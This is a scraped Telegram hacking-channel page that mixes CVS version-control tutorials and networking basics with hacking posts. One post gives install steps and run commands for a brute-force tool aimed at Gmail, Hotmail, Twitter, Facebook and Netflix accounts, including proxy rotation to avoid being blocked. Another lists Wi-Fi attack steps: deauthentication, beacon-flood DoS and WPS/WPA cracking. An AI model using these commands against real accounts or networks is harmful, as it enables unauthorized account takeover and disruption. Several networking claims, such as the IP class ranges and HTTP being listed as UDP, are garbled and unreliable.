UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80.1K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
πŸ¦‘ CVS macro / keyword
====================== ============
CVS will replace the file with a keyword (macro) by default. It is a good working habit to add these keywords to the file.
$ Id $ The keyword is to use the file name, version, and time. , The author and the nature of the code replacement, if you use the -l option to take it out, after Exp
The login user name will be added. In addition to the $ Id $ keyword, RCS also supports the following commonly used keywords:
$ Log $: the change log information you provide.
$ Author $: The author who deposited this version.
$ Locker $: The locker of this version
$ State $: The state of this version Exp (trial version), Stabe (stable version), Rel (release version). The default is Exp
$ Date $: the time this version is saved , Using UTC time format.
$ Revision $: The version number of the version
$ RCSfile $: RCS file name
$ Source $: RCS full path name
$ Name $: Symbol name to retrieve this version
$ Header $: Equivalent to $ Source $$ Revision $$ Date $ The combination of $ Author $$ State $$ Locker $
πŸ¦‘ Sticky Tag
==================================
The role of tag It is a snapshot of multiple continuously changing files to represent all non-stop internal versions of a file at a certain time. Generally, it is a project to a certain stage. You can assign a stage milestone version number to all files uniformly, and you can export them at once Files with different versions. Another very important role of tags is to generate branches and merge branches.
1 cvs tag release_name module_name
----------------------- ------------- The
release_name should be concise and rich in meaning. It consists of a letter at the beginning, plus letters, numbers, underscores and hyphens, especially "."
2 cvs checkout -r release_name module_name
------------------------------------
Take out the tag_name flag file
3 cvs update -A
------------------------------------
The file identified by tag is a historical file and cannot be modified, This can remove this restriction locally and allow it to merge with the current version of
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ CVS branch management
=============================
CVS can save history Divided into multiple independent, parallel and non-influential branches, and to modify the history
1 Calibration milestone
----------------------------- -------
cvs tag release_1_0 prj_dir_name

2 Start a new milestone:
-------------------------------- ----
cvs commit -r 2
mark all files to start the development of 2.x
Note: There is no direct relationship between the recovery in CVS and the release version of the software package. However, the use of version numbers that are consistent with the published version of all files is helpful for maintenance.

3 Create a branch
------------------------------------
When developing the 2.x version of the project, it was found that 1.x had problems, but 2.x did not dare to use it, then export a branch from the previously marked milestone: release_1_0 release_1_0_b2
cvs rtag -b -r release_1_0 release_1_0_bugfixes prj_dir_name
-r What is released_1_0, -b is modified by release_1_0_bugfixes, the version number of cvs will become 4 digits, and each time it is branched in the future, the version number will increase by 2 digits.

4 branches parallel development
-------------- ----------------------
Some people first export the branch release_1_0_bugfixes in another directory: to solve the urgent problem in 1.0,
cvs checkout -r release_1_0_bugfixes
branch is OK Modified and automatically submitted to the branch
while other people are still developing the

5 tag branch on the main branch of the project 2.x
------------------------ ------------
After fixing the error on release_1_0_bugfixes, mark a 1.0 bug fix version number
cvs tag release_1_0_bugfixes_p1

6 Merge branch
----------------- -------------------
If you think 2.0 is also required to modify these errors in 2.0, can also be combined release_1_0_patch_1 at 2.0 development directory Change to the current code:
cvs update -j release_1_0_bugfixes

7 Merge the branch again
------------------------------------
If found again 1. x new bug, I have modified it in the branch and marked release_1_0_patch_2, we also hope to merge it to the trunk.
cvs update -j release_1_0_bugfixes_p1 -j release_1_0_bugfixes
It means to change release_1_0_bugfixes_p1 (tag) to release_1_0_bugfixes (branch) Part of
the previous file is merged into the current file (spine). Otherwise, the content of the previous merge will be re-merged with the 6-step method.
Note: At this time we use the result of step 5
: less frequent tagging, but at the same time, it cannot lead to tag flooding, tag In different branches, you can

lock the branch with the same name 8
------------------------------------
cvs admin -l r_0_2 lock r_0_2 branch
cvs admin -l lock main branch

9 set default branch
---------------------------------- -
cvs admin -b r_0_2 set r_0_2 default branch
cvs admin -b set the main branch

10 to delete the history
if the history file is too large, or to determine a stable version of several stages, we can remove some of the historical documents to Protect cvs performance
cvs admin -o rev1: rev2 filename delete the version from rev1 to rev2, including the two versions
cvs admin -o rev1 :: rev2 filename delete the version from rev1 to rev2, excluding the two versions.
If you omit rev1, it means deleting this branch All versions before rev2
If rev2 is omitted, it means that all versions of this branch after rev1 will be deleted.
cvs admin -o rev filename Delete the file of this version of rev.
Note: the version with tag cannot be deleted, so the tag is very important, and only a single one can be deleted. File

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘ Watchers CVS
=============================
cvs provides a watch function to help everyone understand who is doing what and who is doing the file What operation, it sends email notification to coordinate everyone's work.
1 Turn on the watch function
. Add the following line to the CVSROOT / notify file.
ALL mail% s -s ​​"CVS notification"
2 Set the external email address. The
default is to send notification messages to the local email, to be sent to other addresses. CVSROOT / users add the following content
hwz: kerlion@netease.com
3 watch file modification
cvs watch add filename
cvs watch remove filename
4 watch file modification
watch function is a coordinated function for everyone, everyone must do it in accordance with a unified workflow, If you do not cvs edit, cvs has no way to notify the modification
cvs edit filename to
modify the file
cvs unedit filename
5 Remind everyone to use the watch function
cvs does not have the function of forcing the use of watch. Only this function automatically changes the file to read-only after the user submits it. Then use cvs edit filename to modify it.
cvs watch on
6 View that everyone watch
cvs watchers

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁


WinCVS And configuration
=============================

1) Introduction of WinCVS:
WinCVS is a client software of CVS, which runs on Windows , Used to log in to the CVS server on Windows, and then perform some CVS-related operations and management. Since many enterprises currently use Linux / Unix as the server and Windows as the client, WinCVS and the CVS server will form one of the most powerful version control and management systems.

2) Download and installation
of WinCVS ; the latest WinCVS can be downloaded from http://sourceforge.net/project/showfiles.php?group_id=10072, or the latest version can be downloaded from http://sourceforge.net/project Or other versions of WinCVS.
After downloading the corresponding version, install according to the wizard. For users who have already used CVS, it should be no problem to install this WinCVS!

3) Configure WinCVS:
a. Admin-> Preferences ... / general
CVSROOT Fill in the
Authentication in cvsroot format : used to configure the authentication method of the cvs server. Generally, you only need to select the default pserver method.
It should be noted that it must be consistent
with the authentication method specified during the configuration of the cvs server. If you want to use the ssh server, make sure that openssl is installed in windows, openssh
a, Admin-> Preferences ... / Globals
The configuration is mainly to pay attention to these Options:
Checkout read-only: selected by default, it is recommended not to modify, but you need to edit selection before modifying the file, and it will automatically become read-only after submission.
This has two advantages:
one can undo you through unedit selection. Modification
Two is the usage specification
Prune empty directories: do not select it, otherwise, empty directories will be deleted automatically;

4) Log in to the server:
select Admin-> login, the following dialog box will appear asking the user to enter the login password in the
wincvs command The exit code 0 indicates correct execution, otherwise it fails, and the general success is displayed as
***** CVS exited normally with code 0 *****

5) There is a menu for the use of winCVS, if you are familiar with the use of cvs, use It's very easy, I won't say more

WRITTEN BY UNDERCODERS
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘ FULL CVE GUIDES> BEGINERS & ADVANCED WRITTEN BY UNDERCODERS
Forwarded from UNDERCODE HACKING
This media is not supported in your browser
VIEW IN TELEGRAM
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘HACK GMAIL/netflix..... BRUTEFORCE βœ… :
T.me/UndercodeTesting

πŸ¦‘ π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„• :

1) git clone https://github.com/Matrix07ksa/Brute_Force.git

2) cd Brute_Force

3) sudo apt install python3 python3-pip

pip3 install proxylist

pip3 install mechanize

4) BruteForce Gmail Attack
python3 Brute_Force.py -g Account@gmail.com -l File_list

python3 Brute_Force.py -g Account@gmail.com -p Password_Single

> BruteForce Hotmail Attack
python3 Brute_Force.py -t Account@hotmail.com -l File_list

python3 Brute_Force.py -t Account@hotmail.com -p Password_Single

> BruteForce Twitter Attack
python3 Brute_Force.py -T Account_Twitter -l File_list
python3 Brute_Force.py -T Account_Twitter -l File_list -X proxy-list.txt
BruteForce Facebook Attack
python3 Brute_Force.py -f Account_facebook -l File_list
python3 Brute_Force.py -f Account_facebook -l File_list -X proxy-list.txt

> BruteForce Netflix Attack

Start On Vpn/proxies list > prevent blocking ...
python3 Brute_Force.py -n Account_Netflix -l File_list
python3 Brute_Force.py -n Account_Netflix -l File_list -X proxy-list.txt


▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ¦‘SMB server remote code execution vulnerability
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Intranet WSUS service-How it work ?



1) Applicable objects: All computers that have joined the intranet Active Directory domain, or have manually set up access to the intranet WSUS service (administrators can download the service configuration script)

2) For users in non-technical departments, the system can be set to automatically download and install the required security patches at regular intervals. Users only need to restart the computer as prompted.

3) For users in other departments, the system can be set to automatically download the required security patches and prompt installation, and users can follow the prompts to install and restart the system.

4) If you want to install the patch as soon as possible, the user can restart the computer once.
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘SMB server remote code execution vulnerability

> Microsoft Update Service

1) Applicable objects: All computers that cannot use the intranet WSUS service, including computers that do not have the intranet WSUS service enabled, and computers that have the intranet WSUS service enabled but are not connected to the intranet.

2) For computers that have not enabled the WSUS service on the intranet, users need to ensure that Windows automatic updates are enabled, follow the prompts to install patches and restart the computer

3) For computers with the intranet WSUS service enabled but not connected to the intranet, users need to click the Start menu-All Programs-windowsupdate, click "Check online for updates from windows update" and follow the prompts.
πŸ¦‘ A computer can be specified with multiple IP addresses, and through a specific technology, multiple servers can share an IP address.

> Each interface in the Internet must have a unique IP address, divided into five categories:
Class A is reserved for the government and consists of a 1-byte network address and a 3-byte host address. The highest bit of the network address must be 0 ; The address range is 1.0.0.1 ~ 126.255.255.254

> Class B medium-sized companies, 2 bytes network address, 2 bytes host address, the highest bit of the network address must be 10,128.0.0.1 ~ 223.255.255.254
Class C is assigned to need The highest bit of the person must be 110
192.0.0.1 ~ 239.255.255.254

> Class D is used for multicast. The first byte starts with 1110. It is a specially reserved address and does not point to a specific network. Class E is used for experiments;
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ANY HACKER MUST KNOW THIS :
instagram.com/UndercodeTesting

1) Ports, ports in the hardware field are interfaces. The port in the software field generally refers to the communication protocol port for connection service and connectionless service in the network. It is an abstract software structure, including some data structures and io buffers. The port here specifically refers to the port in tcp / ip. Logical port.

2) Classification,
port distribution
Well-known port, 0-1023 is tightly bound to some specific services, which clearly indicates
the protocol of a certain service. It is not possible to redefine the
registration port of the role object. For many other purposes, different programs can be defined by themselves as needed.

> Dynamic and / or private ports, 49152-65535, theoretically should not assign common services to these ports. Easy to conceal.
Protocol type

> TCP port and UDP port, the two protocols are independent of each other, and the port number is also independent of

> TCP common ports: FTP file transfer protocol, port 21, download and upload files
Telnet: remote login port, can provide a communication service based on DOS mode , 23, the previous BBS

> SMTP, a simple mail transfer protocol, 25
POP3: corresponds to SMTP, used to receive mail, usually POP3 protocol using 110
as long as there is a corresponding program that uses the POP3 protocol, you can log in to the mailbox interface without web. Instead, use a mail program to accept mail directly.
UDP commonly used ports: HTTP hypertext transfer protocol, open 80 to provide services on the computer that provides web page resources.

> DNS: used for domain name resolution services, domain name and IP conversion, 53
SNMP: Simple Network Management Protocol, 161, used to manage network equipment, because there are many network equipment, so connectionless services can show advantages.

> QQ: The program both accepts and provides services. The connectionless protocol is UDP. The QQ server uses 8000 to listen for incoming messages, and 4000 sends out text messages

> TO VIiew the port. You can use some tools to master the port usage. You can use Netstat
scan in Windows . Open ports are important

πŸ¦‘Routing: The activity of moving information from a source location to a target location through a linked network. During the routing process, information will pass through at least one or more intermediate nodes.

> Router: The main node equipment of the Internet. The router determines the data forwarding through routing. The forwarding strategy is called routing. The interconnection hub of different networks, the router system has become the main context based on TCP / IP.

> Gateway: Inter-network connector, protocol converter, the most complex network interconnection device, only used for the interconnection of two networks with different high-level protocols. The gateway can be used for WAN interconnection or local area network, using different communication protocols. The data format or language, or even between two systems with completely different architectures, the gateway is a translator. The gateway to connect two networks.
Routing and gateway

> Gateway refers to the gateway under the TCP / IP protocol cluster. The gateway is essentially the IP address of one network leading to another network. If the host A finds that the target of the data is not in the local network, it sends the data to its own gateway. , Sent to the gateway of B, and then forwarded to the host.

> Ping is only available when IP is installed. Sending data packets and receiving response information, the local host and the remote host must exchange a large number of data packets to trust the correctness of the IP.
// dos command learning
intrusion method
> data-driven attacks, illegal use of system files, forgery of information attacks
against information protocol weaknesses, remote manipulation,
retransmission attacks using system administrator's error attacks, attacks on ICMP messages, targeting original path options Vulnerability attacks
Ethernet broadcast attacks, hopping attacks, stealing TCP protocol links, and taking control of the
system.

> System vulnerabilities refer to flaws in the logical design of application software or operating systems or errors in writing. Human reasons, objective reasons, hardware reasons
Information collection, the first step in collecting information is to obtain an IP address, if you are in a local area network, you need to obtain the DSN server
ping URL of the domain where the machine is located to obtain the website IP
nslookup DNS server
IP location query website IP138 whois in the domain where the machine is located can also find
vulnerabilities in the website registration information monitoring system.

> The scanner is a program that automatically detects security weaknesses in remote or local hosts. By using the scanner, users can leave no traces To discover the allocation of various TCP ports of remote servers, the services provided and their software versions.
How it works: By selecting remote TCP / IP different port services and recording the answers given by the target, a lot of information about the target host is collected.

written by undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘ usefull hacking tips
This media is not supported in your browser
VIEW IN TELEGRAM
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ You can take three steps to protect your Android device :
t.me/undercodeTesting

1) SSL encryption of the device: SSL is one of the best ways to protect sensitive data in transit.

2) Test third-party apps: Try to install apps from first-party vendors such as Google. If you do purchase the application from a third-party store, please use the mobile security vendor to audit the security / authenticity of any third-party code / library used in the mobile application. Read the permissions required by the application before downloading. An example of a permission application that can request a potentially dangerous signal is to allow disclosure of your identity or location or send mail to the Internet.

3) Be wary of SMS Trojan horses: implement control measures to prevent unauthorized access to paid resources. If you request payment via SMS, please proceed with caution.

written by undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘what is Hijacker ?

> Hijacker is a penetration testing tool with a graphical user interface. The tool integrates several well-known WiFi penetration tools, such as Aircrack-ng, Airodump-ng, MDK3, Reaver, etc. Hijacker provides a simple and easy-to-use UI interface, users do not have to manually enter commands or copy and paste MAC addresses on the console.

> This application is only available in the Android version (ARM) and requires the device to have a wireless network card that supports Monitor Mode. Currently only a few devices are eligible, so you may need to use custom firmware

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Hack wifi steps

A) information collection

1. View available WiFi hotspots around, including hidden hotspots;
2. View specific network and client activities by analyzing signals and data packets;
3. Count hotspot confidence;
4. View manufacturer information of hotspot devices;
5. View device signals Strength;
6. Save the captured data packet (.cap file);


B) Wireless attack

1. De-
authenticate (
drop ) all clients of a specific / non-specific network; 2. De- authenticate ( drop ) of specific clients; 3. Launch MDK3 beacon flood attacks with specific options;
4 Do MDK3 identity authentication DoS attacks against specific networks or users;
5. Capture WPA handshake packets and crack WEP networks;
6. Reaver WPS crack attacks;


C) other

1. Copy command or MAC address to clipboard;
2. Integrate dependent components without manual installation;
3. Integrate nexmon driver and related management components;
4. Use custom dictionary to crack .cap file;
5. Use parameter to filter wireless Hotspots;
6. Export all collected information to files;

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁